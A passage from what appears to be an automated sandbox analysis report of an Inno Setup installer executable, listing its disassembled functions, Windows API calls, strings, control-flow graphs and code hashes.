                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLastWindow$CodeCommandCreateDirectoryE69840ExitF47180LineLongMessageMultipleObjectsPeekProcessRemoveSleepWait
                                          • String ID: " %d %d $/SL4 $%x "$InnoSetupLdrWindow$STATIC
                                          • API String ID: 3694042369-4098424104
                                          • Opcode ID: 4cd5e1fe10dc0eee086bfc375ea0fbbc4ea89b05899798eae4fd06476412d36a
                                          • Instruction ID: f219f7cac31ccee2f06799d6ad2095848454d82f650cf495ad7db1cb02fef157
                                          • Opcode Fuzzy Hash: 4cd5e1fe10dc0eee086bfc375ea0fbbc4ea89b05899798eae4fd06476412d36a
                                          • Instruction Fuzzy Hash: 72411B71A042059FD715EBA9ED45BAA77A8EB88304F20443BE200F73E2D77D9D448B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D68
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D6E
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D82
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: D5550HandleModule
                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                          • API String ID: 920177481-2130885113
                                          • Opcode ID: 237ebf10833006d0dc0d2c52c6fb264561d27bb640f22c1f5f3b6ed9c4347ad9
                                          • Instruction ID: a29a6fcccb8c14819faacb4d8ba10ad4a88b1db07d2c391e7f95c455850d2a24
                                          • Opcode Fuzzy Hash: 237ebf10833006d0dc0d2c52c6fb264561d27bb640f22c1f5f3b6ed9c4347ad9
                                          • Instruction Fuzzy Hash: 4A01A770244340AEF7006B66DE0BB5A3658EBD5758F61453FF440B61C2CF7C6900A6BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Message
                                          • String ID: ,w@$.tmp$<r@$Win32s
                                          • API String ID: 2030045667-2233101040
                                          • Opcode ID: ee98716ca81d67613fc363bd8aed8c31c5098f871ffe2c30284b4ee117b8a8d5
                                          • Instruction ID: 9b1785392df1a669e9b81b74d999d5f094ad276719e7aa1103bef36cba094786
                                          • Opcode Fuzzy Hash: ee98716ca81d67613fc363bd8aed8c31c5098f871ffe2c30284b4ee117b8a8d5
                                          • Instruction Fuzzy Hash: 1C418D706142449BD715EF65EE52AAA77A5EB48704F10843AF900B77E2CB7D6C00CBAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateWindowExA.USER32 ref: 00409D53
                                          • SetWindowLongA.USER32 ref: 00409D6A
                                          • RemoveDirectoryA.KERNEL32(00000000,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E50
                                          • 72E69840.USER32(000902D6,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$CreateDirectoryE69840LongRemove
                                          • String ID: " %d %d $/SL4 $%x "
                                          • API String ID: 119257923-2863619551
                                          • Opcode ID: fac588007fba0bb9514b75f5b2563e1d7310f3a56d49c9a4e8b6fc88e862312c
                                          • Instruction ID: c60c828b4d65f793618b5bb2fef89c4a52c928935432fa832ecf54849e786056
                                          • Opcode Fuzzy Hash: fac588007fba0bb9514b75f5b2563e1d7310f3a56d49c9a4e8b6fc88e862312c
                                          • Instruction Fuzzy Hash: 93415B71A042059FCB01EBA9DD45BAEB7A4EF88304F14457BE200B73E2C77C99858B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 149 4019dc-4019e7 150 401abb-401abd 149->150 151 4019ed-401a02 149->151 152 401a04-401a09 RtlEnterCriticalSection 151->152 153 401a0e-401a2d LocalFree 151->153 152->153 154 401a41-401a47 153->154 155 401a49-401a6e call 4012dc * 3 154->155 156 401a2f-401a3f VirtualFree 154->156 163 401a70-401a85 LocalFree 155->163 164 401a87-401a9d 155->164 156->154 163->163 163->164 166 401aa9-401ab3 RtlDeleteCriticalSection 164->166 167 401a9f-401aa4 RtlLeaveCriticalSection 164->167 167->166
                                          APIs
                                          • RtlEnterCriticalSection.KERNEL32(0040B41C,00000000,00401AB4), ref: 00401A09
                                          • LocalFree.KERNEL32(00000000,00000000,00401AB4), ref: 00401A1B
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A3A
                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A79
                                          • RtlLeaveCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AA4
                                          • RtlDeleteCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AAE
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                          • String ID:
                                          • API String ID: 3782394904-0
                                          • Opcode ID: 6c76a69aab1a1f3df5ba2e12c30d7b7fa82e2f09a92a1617bef653e377a21f91
                                          • Instruction ID: b0c8d0c63b49c6aaabe66432ff64a941bd842da83dadee4e543dc85868b8677d
                                          • Opcode Fuzzy Hash: 6c76a69aab1a1f3df5ba2e12c30d7b7fa82e2f09a92a1617bef653e377a21f91
                                          • Instruction Fuzzy Hash: FD1130707823809ADB11ABA59EC6F523668D745B08F44447EF444BA3F3C77C9950CAAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 188 403da6-403db4 189 403db6-403dbd 188->189 190 403dcd-403dd4 188->190 193 403e83-403e89 ExitProcess 189->193 194 403dc3 189->194 191 403de2-403de9 190->191 192 403dd6-403de0 190->192 195 403deb-403df5 191->195 196 403e5c-403e70 call 403d6c * 2 call 4019dc 191->196 192->190 194->190 197 403dc5-403dc7 194->197 201 403dfa-403e06 195->201 213 403e75-403e7c 196->213 197->190 199 403e8e-403ebd call 4030b4 197->199 201->201 203 403e08-403e12 201->203 206 403e17-403e28 203->206 206->206 209 403e2a-403e31 206->209 211 403e33-403e46 MessageBoxA 209->211 212 403e48-403e57 call 404088 call 40400b 209->212 211->196 212->196 213->199 215 403e7e call 4030b4 213->215 215->193
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExitMessageProcess
                                          • String ID: Error$Runtime error at 00000000
                                          • API String ID: 1220098344-2970929446
                                          • Opcode ID: c79c1e547e07a3d1ac10d563cbf51c4eb115eb0186fe91d057b894d5a3940c77
                                          • Instruction ID: e959e555da05728f6c5869fbe468bed2cd35297cb525c612a59fe2bc640103ba
                                          • Opcode Fuzzy Hash: c79c1e547e07a3d1ac10d563cbf51c4eb115eb0186fe91d057b894d5a3940c77
                                          • Instruction Fuzzy Hash: 9F21C130A203454AD710AF299A457163E99DB89709F04817BE610BB3E3C73D8A49C7EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 291 401918-40193a RtlInitializeCriticalSection 292 401946-40197c call 4012dc * 3 LocalAlloc 291->292 293 40193c-401941 RtlEnterCriticalSection 291->293 300 4019ad-4019c1 292->300 301 40197e 292->301 293->292 305 4019c3-4019c8 RtlLeaveCriticalSection 300->305 306 4019cd 300->306 302 401983-401995 301->302 302->302 304 401997-4019a6 302->304 304->300 305->306
                                          APIs
                                          • RtlInitializeCriticalSection.KERNEL32(0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040192E
                                          • RtlEnterCriticalSection.KERNEL32(0040B41C,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 00401941
                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040196B
                                          • RtlLeaveCriticalSection.KERNEL32(0040B41C,004019D5,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 004019C8
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                          • String ID:
                                          • API String ID: 730355536-0
                                          • Opcode ID: 62b43acc0c014e845e7ec1459505867db7c77a511b853e11806176e9f642a6df
                                          • Instruction ID: 1fbc517603835383e1336f1caa5f3efd636d2a280deaa4dd4e997cee02ce5fac
                                          • Opcode Fuzzy Hash: 62b43acc0c014e845e7ec1459505867db7c77a511b853e11806176e9f642a6df
                                          • Instruction Fuzzy Hash: 2B016DB0A843409EE715AB6A9A56B263AA4D785B04F1484BFF050FA3F3C77C4550C7DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,004090C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040901A
                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,004090C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409023
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID: .tmp
                                          • API String ID: 1375471231-2986845003
                                          • Opcode ID: 1cea449666cdd0ed85d24bb2760ad0d574e486da7f0c2cbca6b096bfadc8e6bf
                                          • Instruction ID: 3220a296c2fa314433b07343a343c63327ff16af74aef59c18056ed8c3e7a7a5
                                          • Opcode Fuzzy Hash: 1cea449666cdd0ed85d24bb2760ad0d574e486da7f0c2cbca6b096bfadc8e6bf
                                          • Instruction Fuzzy Hash: C1210675A002089BDB01EBA5C9529DFB7B9EB48304F10457FE901B73C2DA7C9E059AA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 337 4091a4-4091b5 338 4091b7-4091b8 337->338 339 4091fe-409203 337->339 340 4091ba-4091bd 338->340 341 4091ca-4091cd 340->341 342 4091bf-4091c8 Sleep 340->342 343 4091d8-4091dd call 408c60 341->343 344 4091cf-4091d3 Sleep 341->344 342->343 346 4091e2-4091e4 343->346 344->343 346->339 347 4091e6-4091ee GetLastError 346->347 347->339 348 4091f0-4091f8 GetLastError 347->348 348->339 349 4091fa-4091fc 348->349 349->339 349->340
                                          APIs
                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091C3
                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091D3
                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091E6
                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091F0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLastSleep
                                          • String ID:
                                          • API String ID: 1458359878-0
                                          • Opcode ID: 56aa7e75167a56a920e5b67f4a02156d664ad88dc0045ca53e1708c400c919b7
                                          • Instruction ID: 1baed0ea7b9165708bdd05216e8a8b0124bd17769a51bde77f6f9ef227ebea94
                                          • Opcode Fuzzy Hash: 56aa7e75167a56a920e5b67f4a02156d664ad88dc0045ca53e1708c400c919b7
                                          • Instruction Fuzzy Hash: 6CF09C7270521E67E620B57A5C8956F7258D9C1364711413BEA04FB292D538CC415369
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 407c20-407c4d 352 407c59-407c6a 350->352 353 407c4f-407c54 call 407b34 350->353 356 407c76-407c7a 352->356 357 407c6c-407c71 call 407b34 352->357 353->352 359 407c85-407c8a call 407b34 356->359 360 407c7c-407c83 356->360 357->356 361 407c8f-407c93 359->361 360->359 360->361 363 407c95-407c9a call 407b34 361->363 364 407c9f-407ca8 361->364 363->364 366 407cb7-407cbd 364->366 367 407caa-407cb5 364->367 368 407cca-407ce4 call 408818 366->368 369 407cbf-407cc8 366->369 367->366 367->367 372 407ce6-407ce9 368->372 373 407cea-407cf8 368->373 369->368 369->369 372->373 374 407d27-407d5e call 4081c4 373->374 375 407cfa-407d1a call 407bc4 VirtualAlloc 373->375 380 407d60 374->380 381 407d92-407dad call 403198 374->381 382 407d21-407d24 375->382 383 407d1c call 405850 375->383 384 407d62-407d8d call 405160 call 407abc 380->384 385 407d64-407d6e call 407b34 380->385 382->374 383->382 384->381 385->381
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407D0E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: -$LzmaDecoderInit failed (%d)
                                          • API String ID: 4275171209-4285503710
                                          • Opcode ID: d2110b3af6429a55875fc7914625e4dc743a4f6743e9e24e16858dd4763aa917
                                          • Instruction ID: a48428d8d5412f9af56008512fb6c35eaa3a2c32f4c8ff32bf9af2dfcb8c22bf
                                          • Opcode Fuzzy Hash: d2110b3af6429a55875fc7914625e4dc743a4f6743e9e24e16858dd4763aa917
                                          • Instruction Fuzzy Hash: 6C514370E082499FEB00DFA9C4457AEBBB5EF45304F1480BAE504F72D2D778AD458B9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 396 401fd4-401fe6 397 401fe8 call 401918 396->397 398 401ffb-402010 396->398 404 401fed-401fef 397->404 400 402012-402017 RtlEnterCriticalSection 398->400 401 40201c-402025 398->401 400->401 402 402027 401->402 403 40202c-402032 401->403 402->403 405 402038-40203c 403->405 406 4020cb-4020d1 403->406 404->398 407 401ff1-401ff6 404->407 410 402041-402050 405->410 411 40203e 405->411 408 4020d3-4020e0 406->408 409 40211d-40211f call 401ee0 406->409 412 40214f-402158 407->412 413 4020e2-4020ea 408->413 414 4020ef-40211b call 402f54 408->414 420 402124-40213b 409->420 410->406 415 402052-402060 410->415 411->410 413->414 414->412 418 402062-402066 415->418 419 40207c-402080 415->419 422 402068 418->422 423 40206b-40207a 418->423 425 402082 419->425 426 402085-4020a0 419->426 427 402147 420->427 428 40213d-402142 RtlLeaveCriticalSection 420->428 422->423 429 4020a2-4020c6 call 402f54 423->429 425->426 426->429 428->427 429->412
                                          APIs
                                          • RtlEnterCriticalSection.KERNEL32(0040B41C,00000000,00402148), ref: 00402017
                                            • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040192E
                                            • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040B41C,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 00401941
                                            • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040196B
                                            • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040B41C,004019D5,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 004019C8
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                          • String ID:
                                          • API String ID: 296031713-0
                                          • Opcode ID: 2956ed08cba00207c91bedb70f797ce2ba9ba79a1d7e08a1effb931987ae65ce
                                          • Instruction ID: ed07ada503c9dfb2e1eb27cc502ea44feb9c5f3764cbaabb531550d88a14e1fb
                                          • Opcode Fuzzy Hash: 2956ed08cba00207c91bedb70f797ce2ba9ba79a1d7e08a1effb931987ae65ce
                                          • Instruction Fuzzy Hash: D641D1B2A40705DFDB10CF69DE8561A77A0FB58314B15827BD944B73E2D3789941CB8C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 432 408c60-408c78 call 408c14 435 408c81-408caf call 4034b8 6CAD5F60 GetLastError 432->435 436 408c7a-408cd5 432->436 440 408cb4-408cbc call 408c50 435->440
                                          APIs
                                          • 6CAD5F60.KERNEL32(00000000,00000000,00408CBD,?,0000000D,00000000), ref: 00408C97
                                          • GetLastError.KERNEL32(00000000,00000000,00408CBD,?,0000000D,00000000), ref: 00408C9F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: 467da67866ddee734c22c825485f8c3ad707a3113f5d79c4c45c78662779c30e
                                          • Instruction ID: 50205cdb67d28fc191fb2c331cd0b23a95458e84667133931a3cee916848f83d
                                          • Opcode Fuzzy Hash: 467da67866ddee734c22c825485f8c3ad707a3113f5d79c4c45c78662779c30e
                                          • Instruction Fuzzy Hash: 2FF02230A09708ABEB00EFB59D418ADB3FCDB4931079149BFE914F3381EA384E1042B8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00008000), ref: 00406DFE
                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406E48,?,00000000,00406E66,?,00008000), ref: 00406E2D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLibraryLoadMode
                                          • String ID:
                                          • API String ID: 2987862817-0
                                          • Opcode ID: b3393015f1b4cf888f94ac6815341bd1027e86fadb80852e539b0537c044c6ba
                                          • Instruction ID: c0beb44b57a6fed944bfd097530307aaa8a821c5429653af2602c50d3bc0072e
                                          • Opcode Fuzzy Hash: b3393015f1b4cf888f94ac6815341bd1027e86fadb80852e539b0537c044c6ba
                                          • Instruction Fuzzy Hash: 2DF08275A14704BFDB125F76DC6282BBBACE749F0075348B6F910A26D1E53C892085A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RemoveDirectoryA.KERNEL32(00000000,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E50
                                          • 72E69840.USER32(000902D6,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E64
                                            • Part of subcall function 004091A4: Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091C3
                                            • Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091E6
                                            • Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091F0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLast$DirectoryE69840RemoveSleep
                                          • String ID:
                                          • API String ID: 2747185952-0
                                          • Opcode ID: a868a6e5d00a0acde263f6599406e2a8c040d2c0d3f70bd5f57d2dc34d7e2dd5
                                          • Instruction ID: e69e0b332c88c819040577c0555826280b0c87ea955f984b77490ea3e21026c3
                                          • Opcode Fuzzy Hash: a868a6e5d00a0acde263f6599406e2a8c040d2c0d3f70bd5f57d2dc34d7e2dd5
